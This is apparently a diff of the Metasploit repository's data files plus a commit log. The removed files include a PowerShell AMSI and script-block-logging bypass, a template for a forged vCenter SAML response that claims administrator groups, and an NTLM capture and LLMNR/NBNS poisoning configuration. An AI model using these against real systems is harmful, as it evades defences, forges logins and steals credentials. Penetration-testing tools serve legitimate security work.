-    description: 'Find all registered SCCM/MECM management points'
-    filter: '(objectclass=mssmsmanagementpoint)'
-    attributes:
-      - cn
-      - dNSHostname
-      - msSMSSiteCode
-    references:
-      - https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/RECON/RECON-1/recon-1_description.md
@@ -1,9 +0,0 @@
---
-queries:
-#  - action: SAMPLE_ACTION
-#    description: 'A description.'
-#    # base_dn_prefix: 'An optional string to prefix to the Base DN'
-#    filter: '(objectClass=*)'
-#    attributes:
-#      - dn
-#      - objectClass
@@ -1,55 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Destination="https://<%= vcenter_fqdn.encode(xml: :text) %>/ui/saml/websso/sso" ID="_<%= vcenter_saml_response_id.encode(xml: :text) %>" InResponseTo="<%= vcenter_saml_id.encode(xml: :text) %>" IssueInstant="<%= vcenter_saml_issue.encode(xml: :text) %>" Version="2.0">
-    <saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">https://<%= vcenter_fqdn.encode(xml: :text) %>/websso/SAML2/Metadata/<%= vcenter_saml_domain.encode(xml: :text) %></saml2:Issuer>
-    <saml2p:Status>
-        <saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
-        <saml2p:StatusMessage>Request successful</saml2p:StatusMessage>
-    </saml2p:Status>
-    <saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ID="_<%= vcenter_saml_assert_id.encode(xml: :text) %>" IssueInstant="<%= vcenter_saml_issue.encode(xml: :text) %>" Version="2.0">
-        <saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">https://<%= vcenter_fqdn.encode(xml: :text) %>/websso/SAML2/Metadata/<%= vcenter_saml_domain.encode(xml: :text) %></saml2:Issuer>
-        <saml2:Subject>
-            <saml2:NameID Format="http://schemas.xmlsoap.org/claims/UPN"><%= vcenter_saml_user.encode(xml: :text) %>@<%= vcenter_saml_domain.encode(xml: :text) %></saml2:NameID>
-            <saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
-                <saml2:SubjectConfirmationData InResponseTo="<%= vcenter_saml_id.encode(xml: :text) %>" NotOnOrAfter="<%= vcenter_saml_not_after.encode(xml: :text) %>" Recipient="https://<%= vcenter_fqdn.encode(xml: :text) %>/ui/saml/websso/sso"/>
-            </saml2:SubjectConfirmation>
-        </saml2:Subject>
-        <saml2:Conditions NotBefore="<%= vcenter_saml_not_before.encode(xml: :text) %>" NotOnOrAfter="<%= vcenter_saml_not_after.encode(xml: :text) %>">
-            <saml2:ProxyRestriction Count="10"/>
-            <saml2:Condition xmlns:rsa="http://www.rsa.com/names/2009/12/std-ext/SAML2.0" Count="10" xsi:type="rsa:RenewRestrictionType"/>
-            <saml2:AudienceRestriction>
-                <saml2:Audience>https://<%= vcenter_fqdn.encode(xml: :text) %>/ui/saml/websso/metadata</saml2:Audience>
-            </saml2:AudienceRestriction>
-        </saml2:Conditions>
-        <saml2:AuthnStatement AuthnInstant="<%= vcenter_saml_issue.encode(xml: :text) %>" SessionIndex="_<%= vcenter_saml_idx_id.encode(xml: :text) %>" SessionNotOnOrAfter="<%= vcenter_saml_not_after.encode(xml: :text) %>">
-            <saml2:AuthnContext>
-                <saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef>
-            </saml2:AuthnContext>
-        </saml2:AuthnStatement>
-        <saml2:AttributeStatement>
-            <saml2:Attribute FriendlyName="userPrincipalName" Name="http://schemas.xmlsoap.org/claims/UPN" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_user.encode(xml: :text) %>@<%= vcenter_saml_domain.encode(xml: :text) %></saml2:AttributeValue>
-            </saml2:Attribute>
-            <saml2:Attribute FriendlyName="Groups" Name="http://rsa.com/schemas/attr-names/2009/01/GroupIdentity" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\Users</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\Administrators</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\CAAdmins</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\ComponentManager.Administrators</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.BashShellAdministrators</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.ReadOnly</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.SupportUsers</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.Administrators</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\LicenseService.Administrators</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\Everyone</saml2:AttributeValue>
-            </saml2:Attribute>
-            <saml2:Attribute FriendlyName="Subject Type" Name="http://vmware.com/schemas/attr-names/2011/07/isSolution" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
-                <saml2:AttributeValue xsi:type="xsd:string">false</saml2:AttributeValue>
-            </saml2:Attribute>
-            <saml2:Attribute FriendlyName="surname" Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %></saml2:AttributeValue>
-            </saml2:Attribute>
-            <saml2:Attribute FriendlyName="givenName" Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_user.encode(xml: :text) %></saml2:AttributeValue>
-            </saml2:Attribute>
-        </saml2:AttributeStatement>
-    </saml2:Assertion>
-</saml2p:Response>
@@ -1,11 +0,0 @@
-meterpreter
-    ▄▄▄▄    ▒█████    █████▒
-    ▓█████▄ ▒██▒  ██▒▓██   ▒
-    ▒██▒ ▄██▒██░  ██▒▒████ ░
-    ▒██░█▀  ▒██   ██░░▓█▒  ░
-    ░▓█  ▀█▓░ ████▓▒░░▒█░
-    ░▒▓███▀▒░ ▒░▒░▒░  ▒ ░
-    ▒░▒   ░   ░ ▒ ▒░  ░     ~ by @kev169, @GuhnooPluxLinux, @R0wdyJoe, @skylerknecht ~
-    ░    ░ ░ ░ ░ ▒   ░ ░
-    ░          ░ ░  loader
-        ░
@@ -1,57 +0,0 @@
-# configuration file for the capture plugin
-spoof_regex: .*
-ntlm_challenge: "1122334455667788"
-ntlm_domain: anonymous
-http_basic: no
-ssl_cert: null
-logfile: null
-hashdir: null
-services:
-  # authentication services
-  - type: DRDA
-    enabled: yes
-  - type: FTP
-    enabled: yes
-  - type: HTTP
-    enabled: yes
-  - type: HTTPS
-    enabled: yes
-  - type: IMAP
-    enabled: yes
-  - type: LDAP
-    enabled: yes
-  - type: MSSQL
-    enabled: yes
-  - type: MySQL
-    enabled: yes
-  - type: POP3
-    enabled: yes
-  - type: Postgres
-    enabled: yes
-  - type: PrintJob
-    enabled: yes
-  - type: SIP
-    enabled: yes
-  - type: SMB
-    enabled: yes
-  - type: SMTP
-    enabled: yes
-  - type: Telnet
-    enabled: yes
-  - type: VNC
-    enabled: yes
-  - type: FTPS
-    enabled: yes
-  - type: IMAPS
-    enabled: yes
-  - type: POP3S
-    enabled: yes
-  - type: SMTPS
-    enabled: yes
-  # spoofing / poisoning services
-  - type: NBNS
-    enabled: yes
-  - type: LLMNR
-    enabled: yes
-  - type: mDNS
-    enabled: yes
@@ -1,35 +0,0 @@
-## Setup
-
-This contains setup steps used for acceptance testing of the `cmd_exec` API. We will make use of the gcc docker image to
-build out the C binaries to then be uploaded to the host machine, so they can be used as part of the `cmd_exec`
-create process API.
-
-This directory contains:
- C executable `show_args.c`
-  This file is used as part of the `cmd_exec` testing as it requires a file to take args, then loop over them and output
-  those args back to the user.
-
- Makefile to build the binaries `makefile.mk`
-  This file is used to create the binaries for both Windows and Linux that the docker command below will make use of.
-  This will output the following binaries:
-
-  - Precompiled binary for Windows
-    - `show_args.exe`
-
-  - Precompiled binary for Linux and Mettle
-    - `show_args`
-
-### Note
-
-You will need to compile the OSX payload separately on an OSX machine, Docker is not supported. The test assume the file
-will be named as `show_args_macos`.
-
-
-## Compile binaries locally
-
-We make use of gcc for this: https://hub.docker.com/_/gcc
-
- Run:
-```shell
-docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:11.4.0 /bin/bash -c "apt update && apt install -y gcc-mingw-w64 && make all -f makefile.mk"
-```
@@ -1,5 +0,0 @@
-all: show_args_linux show_args_windows
-show_args_linux: show_args.c
-	cc show_args.c -o show_args_linux
-show_args_windows: show_args.c
-	x86_64-w64-mingw32-gcc show_args.c -o show_args.exe
@@ -1,7 +0,0 @@
-int printf(const char *format, ...);
-
-int main(int argc, char *argv[]) {
-    for (int i = 0; i < argc; i++) {
-        printf("%s\n", argv[i]);
-    }
-}
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
+strip cpuinfo.ia32.bin && \
+gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
+strip cpuinfo.ia64.bin && \
+i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
+strip cpuinfo.exe
+
+ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
+
@@ -0,0 +1,64 @@
+// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
+
+/*
+#!/usr/bin/env ruby
+#    This file is part of Metasm, the Ruby assembly manipulation suite
+#    Copyright (C) 2006-2009 Yoann GUILLOT
+#
+#    Licence is LGPL, see LICENCE in the top-level directory
+
+
+#
+# this sample shows the compilation of a slightly more complex program
+# it displays in a messagebox the result of CPUID
+#
+
+*/
+
+#include <unistd.h>
+#include <stdio.h>
+
+static char *featureinfo[32] = {
+	"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
+	"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
+	"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
+	"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
+}, *extendinfo[32] = {
+	"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
+	"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
+	"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
+	"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
+};
+
+#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
+#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
+int main(void)
+{
+
+	unsigned long eax, ebx, ecx, edx;
+	unsigned long i;
+
+	cpuid(0);
+	fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
+
+	cpuid(1);
+	fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
+			b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
+	fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
+			b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
+
+	fprintf(stdout, "FLAGS:");
+	for (i=0 ; i<32 ; i++)
+		if (edx & (1 << i))
+			fprintf(stdout, " %s", featureinfo[i]);
+
+	for (i=0 ; i<32 ; i++)
+		if (ecx & (1 << i))
+			fprintf(stdout, " %s", extendinfo[i]);
+
+	fprintf(stdout, "\n");
+	fflush(stdout);
+
+	return 0;
+}
+
@@ -13,4 +13,4 @@ responsible for corrupting the Metasploit Framework installation.

 For more information about EICAR, please see the following web site:

-https://www.eicar.org/download-anti-malware-testfile/
+http://www.eicar.org/anti_virus_test_file.htm
@@ -1,174 +0,0 @@
-<?xml version="1.0" ?>
-<!--
-  This file was generated by hand since no automated analysis and generation tool currently exists for Powershell code.
-->
-<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:xsi="http://graphml.graphdrawing.org/xmlns" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd">
-  <key id="address" for="all" attr.name="address" attr.type="long"/>
-  <key id="type" for="all" attr.name="type" attr.type="string"/>
-  <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
-  <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
-  <graph edgedefault="directed">
-    <node id="block.1">
-      <data key="address">1</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">1</data>
-        <data key="type">block</data>
-        <node id="block.1:instruction.1">
-          <data key="address">1</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">If($PSVersionTable.PSVersion.Major -ge 3){</data>
-        </node>
-        <node id="block.1:instruction.2">
-          <data key="address">2</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    $val=[Collections.Generic.Dictionary[string,System.Object]]::new();</data>
-        </node>
-        <node id="block.1:instruction.3">
-          <data key="address">3</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    $Ref1=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.AmsiUtils', threshold: 0.3) %&gt;);</data>
-        </node>
-        <node id="block.1:instruction.4">
-          <data key="address">4</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    if ($Ref1) { $Ref1.GetField(&lt;%= Rex::Powershell::Obfu.scate_string_literal('amsiInitFailed', threshold: 0.3) %&gt;,'NonPublic,Static').SetValue($null,$true); };</data>
-        </node>
-        <node id="block.1:instruction.5">
-          <data key="address">5</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    $Ref2=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.Utils') %&gt;);</data>
-        </node>
-        <node id="block.1:instruction.6">
-          <data key="address">6</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    $GPF=$Ref2.GetField('cachedGroupPolicySettings','NonPublic,Static');</data>
-        </node>
-        <node id="block.1:instruction.7">
-          <data key="address">7</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    If ($GPF) {</data>
-        </node>
-        <node id="block.1:instruction.8">
-          <data key="address">8</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $SBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging') %&gt;;</data>
-        </node>
-        <node id="block.1:instruction.9">
-          <data key="address">9</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $EnableSBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockLogging') %&gt;;</data>
-        </node>
-        <node id="block.1:instruction.10">
-          <data key="address">10</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $EnableSBIL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockInvocationLogging') %&gt;;</data>
-        </node>
-        <node id="block.1:instruction.11">
-          <data key="address">11</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $GPC=$GPF.GetValue($null);</data>
-        </node>
-        <edge source="block.1:instruction.1" target="block.1:instruction.3"/>
-        <edge source="block.1:instruction.1" target="block.1:instruction.5"/>
-        <edge source="block.1:instruction.3" target="block.1:instruction.4"/>
-        <edge source="block.1:instruction.4" target="block.1:instruction.7"/>
-        <edge source="block.1:instruction.5" target="block.1:instruction.6"/>
-        <edge source="block.1:instruction.6" target="block.1:instruction.7"/>
-        <edge source="block.1:instruction.7" target="block.1:instruction.11"/>
-      </graph>
-    </node>
-    <node id="block.12">
-      <data key="address">12</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">12</data>
-        <data key="type">block</data>
-        <node id="block.12:instruction.12">
-          <data key="address">12</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        If($GPC[$SBL]){</data>
-        </node>
-        <node id="block.12:instruction.13">
-          <data key="address">13</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">            $GPC[$SBL][$EnableSBL]=0;</data>
-        </node>
-        <node id="block.12:instruction.14">
-          <data key="address">14</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">            $GPC[$SBL][$EnableSBIL]=0;</data>
-        </node>
-        <node id="block.12:instruction.15">
-          <data key="address">15</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        }</data>
-        </node>
-        <edge source="block.12:instruction.12" target="block.12:instruction.13"/>
-        <edge source="block.12:instruction.12" target="block.12:instruction.14"/>
-        <edge source="block.12:instruction.13" target="block.12:instruction.15"/>
-        <edge source="block.12:instruction.14" target="block.12:instruction.15"/>
-      </graph>
-    </node>
-    <node id="block.16">
-      <data key="address">16</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">16</data>
-        <data key="type">block</data>
-        <node id="block.16:instruction.16">
-          <data key="address">16</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $val.Add($EnableSBL,0);</data>
-        </node>
-        <node id="block.16:instruction.17">
-          <data key="address">17</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $val.Add($EnableSBIL,0);</data>
-        </node>
-        <node id="block.16:instruction.18">
-          <data key="address">18</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$SBL]=$val;</data>
-        </node>
-        <edge source="block.16:instruction.16" target="block.16:instruction.18"/>
-        <edge source="block.16:instruction.17" target="block.16:instruction.18"/>
-      </graph>
-    </node>
-    <node id="block.19">
-      <data key="address">19</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">19</data>
-        <data key="type">block</data>
-        <node id="block.19:instruction.19">
-          <data key="address">19</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    } Else {</data>
-        </node>
-        <node id="block.19:instruction.20">
-          <data key="address">20</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        [Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.ScriptBlock') %&gt;).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]));</data>
-        </node>
-        <node id="block.19:instruction.21">
-          <data key="address">21</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    }</data>
-        </node>
-        <node id="block.19:instruction.22">
-          <data key="address">22</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">};</data>
-        </node>
-        <edge source="block.19:instruction.19" target="block.19:instruction.20"/>
-        <edge source="block.19:instruction.20" target="block.19:instruction.21"/>
-        <edge source="block.19:instruction.21" target="block.19:instruction.22"/>
-      </graph>
-    </node>
-    <edge source="block.1" target="block.12"/>
-    <edge source="block.1" target="block.16"/>
-    <edge source="block.12" target="block.19"/>
-    <edge source="block.16" target="block.19"/>
-  </graph>
-</graphml>
@@ -1,336 +0,0 @@
-{
-  "exchange_builds": [
-    {
-      "name": "Exchange Server 4.0",
-      "builds": [
-        "4.0.996",
-        "4.0.995",
-        "4.0.994",
-        "4.0.993",
-        "4.0.838",
-        "4.0.837"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 5.0",
-      "builds": [
-        "5.0.1460",
-        "5.0.1458",
-        "5.0.1457"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 5.5",
-      "builds": [
-        "5.5.2653",
-        "5.5.2650",
-        "5.5.2448",
-        "5.5.2232",
-        "5.5.1960"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 2000",
-      "builds": [
-        "6.0.6620.7",
-        "6.0.6620.5",
-        "6.0.6603",
-        "6.0.6556",
-        "6.0.6487",
-        "6.0.6249",
-        "6.0.5762",
-        "6.0.4712",
-        "6.0.4417"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 2003",
-      "builds": [
-        "6.5.7654.4",
-        "6.5.7653.33",
-        "6.5.7683",
-        "6.5.7226",
-        "6.5.6944"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 2007",
-      "builds": [
-        "8.3.517.0",
-        "8.3.502.0",
-        "8.3.485.1",
-        "8.3.468.0",
-        "8.3.459.0",
-        "8.3.445.0",
-        "8.3.417.1",
-        "8.3.406.0",
-        "8.3.389.2",
-        "8.3.379.2",
-        "8.3.348.2",
-        "8.3.342.4",
-        "8.3.327.1",
-        "8.3.298.3",
-        "8.3.297.2",
-        "8.3.279.6",
-        "8.3.279.5",
-        "8.3.279.3",
-        "8.3.264.0",
-        "8.3.245.2",
-        "8.3.213.1",
-        "8.3.192.1",
-        "8.3.159.2",
-        "8.3.137.3",
-        "8.3.106.2",
-        "8.3.83.6",
-        "8.2.305.3",
-        "8.2.254.0",
-        "8.2.247.2",
-        "8.2.234.1",
-        "8.2.217.3",
-        "8.2.176.2",
-        "8.1.436.0",
-        "8.1.393.1",
-        "8.1.375.2",
-        "8.1.359.2",
-        "8.1.340.1",
-        "8.1.336.1",
-        "8.1.311.3",
-        "8.1.291.2",
-        "8.1.278.2",
-        "8.1.263.1",
-        "8.1.240.6",
-        "8.0.813.0",
-        "8.0.783.2",
-        "8.0.754.0",
-        "8.0.744.0",
-        "8.0.730.1",
-        "8.0.711.2",
-        "8.0.708.3",
-        "8.0.685.25"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 2010",
-      "builds": [
-        "14.3.513.0",
-        "14.3.509.0",
-        "14.3.496.0",
-        "14.3.468.0",
-        "14.3.461.1",
-        "14.3.452.0",
-        "14.3.442.0",
-        "14.3.435.0",
-        "14.3.419.0",
-        "14.3.417.1",
-        "14.3.411.0",
-        "14.3.399.2",
-        "14.3.389.1",
-        "14.3.382.0",
-        "14.3.361.1",
-        "14.3.352.0",
-        "14.3.336.0",
-        "14.3.319.2",
-        "14.3.301.0",
-        "14.3.294.0",
-        "14.3.279.2",
-        "14.3.266.2",
-        "14.3.248.2",
-        "14.3.235.1",
-        "14.3.224.2",
-        "14.3.224.1",
-        "14.3.210.2",
-        "14.3.195.1",
-        "14.3.181.6",
-        "14.3.174.1",
-        "14.3.169.1",
-        "14.3.158.1",
-        "14.3.146.0",
-        "14.3.123.4",
-        "14.2.390.3",
-        "14.2.375.0",
-        "14.2.342.3",
-        "14.2.328.10",
-        "14.3.328.5",
-        "14.2.318.4",
-        "14.2.318.2",
-        "14.2.309.2",
-        "14.2.298.4",
-        "14.2.283.3",
-        "14.2.247.5",
-        "14.1.438.0",
-        "14.1.421.3",
-        "14.1.421.2",
-        "14.1.421.0",
-        "14.1.355.2",
-        "14.1.339.1",
-        "14.1.323.6",
-        "14.1.289.7",
-        "14.1.270.1",
-        "14.1.255.2",
-        "14.1.218.15",
-        "14.0.726.0",
-        "14.0.702.1",
-        "14.0.694.0",
-        "14.0.689.0",
-        "14.0.682.1",
-        "14.0.639.21"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 2013",
-      "builds": [
-        "15.0.1497.40",
-        "15.0.1497.36",
-        "15.0.1497.33",
-        "15.0.1497.28",
-        "15.0.1497.26",
-        "15.0.1497.24",
-        "15.0.1497.23",
-        "15.0.1497.18",
-        "15.0.1497.15",
-        "15.0.1497.12",
-        "15.0.1497.2",
-        "15.0.1473.6",
-        "15.0.1473.3",
-        "15.0.1395.12",
-        "15.0.1395.4",
-        "15.0.1367.3",
-        "15.0.1365.1",
-        "15.0.1347.2",
-        "15.0.1320.4",
-        "15.0.1293.2",
-        "15.0.1263.5",
-        "15.0.1236.3",
-        "15.0.1210.3",
-        "15.0.1178.4",
-        "15.0.1156.6",
-        "15.0.1130.7",
-        "15.0.1104.5",
-        "15.0.1076.9",
-        "15.0.1044.25",
-        "15.0.995.29",
-        "15.0.913.22",
-        "15.0.847.64",
-        "15.0.847.32",
-        "15.0.775.38",
-        "15.0.712.24",
-        "15.0.620.29",
-        "15.0.516.32"
-      ],
-      "eol": false
-    },
-    {
-      "name": "Exchange Server 2016",
-      "builds": [
-        "15.1.2507.12",
-        "15.1.2507.9",
-        "15.1.2507.6",
-        "15.1.2375.31",
-        "15.1.2375.28",
-        "15.1.2375.24",
-        "15.1.2375.18",
-        "15.1.2375.17",
-        "15.1.2375.12",
-        "15.1.2375.7",
-        "15.1.2308.21",
-        "15.1.2308.20",
-        "15.1.2308.15",
-        "15.1.2308.14",
-        "15.1.2308.8",
-        "15.1.2242.12",
-        "15.1.2242.10",
-        "15.1.2242.8",
-        "15.1.2242.4",
-        "15.1.2176.14",
-        "15.1.2176.12",
-        "15.1.2176.9",
-        "15.1.2176.2",
-        "15.1.2106.13",
-        "15.1.2106.2",
-        "15.1.2044.13",
-        "15.1.2044.4",
-        "15.1.1979.8",
-        "15.1.1979.3",
-        "15.1.1913.12",
-        "15.1.1913.5",
-        "15.1.1847.12",
-        "15.1.1847.3",
-        "15.1.1779.8",
-        "15.1.1779.2",
-        "15.1.1713.10",
-        "15.1.1713.5",
-        "15.1.1591.18",
-        "15.1.1591.10",
-        "15.1.1531.12",
-        "15.1.1531.3",
-        "15.1.1466.16",
-        "15.1.1466.3",
-        "15.1.1415.10",
-        "15.1.1415.2",
-        "15.1.1261.35",
-        "15.1.1034.26",
-        "15.1.845.34",
-        "15.1.669.32",
-        "15.1.544.27",
-        "15.1.466.34",
-        "15.1.396.30",
-        "15.1.225.42",
-        "15.1.225.16"
-      ],
-      "eol": false
-    },
-    {
-      "name": "Exchange Server 2019",
-      "builds": [
-        "15.2.1118.12",
-        "15.2.1118.9",
-        "15.2.1118.7",
-        "15.2.986.29",
-        "15.2.986.26",
-        "15.2.986.22",
-        "15.2.986.15",
-        "15.2.986.14",
-        "15.2.986.9",
-        "15.2.986.5",
-        "15.2.922.20",
-        "15.2.922.19",
-        "15.2.922.14",
-        "15.2.922.13",
-        "15.2.922.7",
-        "15.2.858.15",
-        "15.2.858.12",
-        "15.2.858.10",
-        "15.2.858.5",
-        "15.2.792.15",
-        "15.2.792.13",
-        "15.2.792.10",
-        "15.2.792.3",
-        "15.2.721.13",
-        "15.2.721.2",
-        "15.2.659.12",
-        "15.2.659.4",
-        "15.2.595.8",
-        "15.2.595.3",
-        "15.2.529.13",
-        "15.2.529.5",
-        "15.2.464.15",
-        "15.2.464.5",
-        "15.2.397.11",
-        "15.2.397.3",
-        "15.2.330.11",
-        "15.2.330.5",
-        "15.2.221.18",
-        "15.2.221.12",
-        "15.2.196.0"
-      ],
-      "eol": false
-    }
-  ]
-}
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Jacob Robles	715279311a	Land #8422 , Typo3 News Module Sql Injection exploit	2018-03-15 09:21:14 -07:00
h00die	8af0d9ceaa	Land #9713 update to juniper config docs	2018-03-15 06:49:02 -07:00
Brent Cook	44ac2e9c58	Land #9710 , update test with proper CPE	2018-03-15 06:49:02 -07:00
Brent Cook	bf43542743	Land #9705 , update rubocop rules	2018-03-15 06:49:01 -07:00
Tim W	8f4895c8e7	Land #9706 , bump metasploit payloads to fix #9497	2018-03-13 13:33:29 -07:00
Brent Cook	c5e231cfbf	Land #9686 , add ipv6 to slowloris, rhost to non-scanner modules	2018-03-13 13:33:28 -07:00
Brent Cook	028d329b4d	Land #9632 , owa_login and auth_brute enhancements	2018-03-12 10:14:19 -07:00
Jacob Robles	8c60a73731	varnish anonymous file read	2018-03-09 14:55:11 -06:00
Jacob Robles	bcc0a2a94c	Land #7654 , varnish file read	2018-03-09 12:53:20 -08:00
Metasploit	149f04cc58	Bump version of framework to 4.16.45	2018-03-08 10:05:29 -08:00
Jeffrey Martin	4778de053a	Land #9687 , bump payloads, fix PHP meterpreter message parsing	2018-03-07 18:47:47 -08:00
Jacob Robles	49bc0024c1	Land #9678 , Add memcached UDP version scanner	2018-03-07 18:47:47 -08:00
Jacob Robles	fbee660136	Land #9554 , Eclipse Equinoxe OSGi console RCE	2018-03-07 07:49:31 -08:00
Jon Hart	64019d3301	Land #9676 , correcting CVE and adding disclosure date for memcached amplification	2018-03-07 07:49:30 -08:00
bwatters-r7	4ef90d8d6c	Land #9606 , Add some tests for cmd_exec Merge branch 'for-the-windows' into upstream-master	2018-03-07 07:49:30 -08:00
Christian Mehlmauer	c1b50f728b	Land #9672 , fix docker build	2018-03-07 07:49:30 -08:00
Brent Cook	f6223c0193	Land #9614 , Juniper post enum module	2018-03-07 07:49:29 -08:00
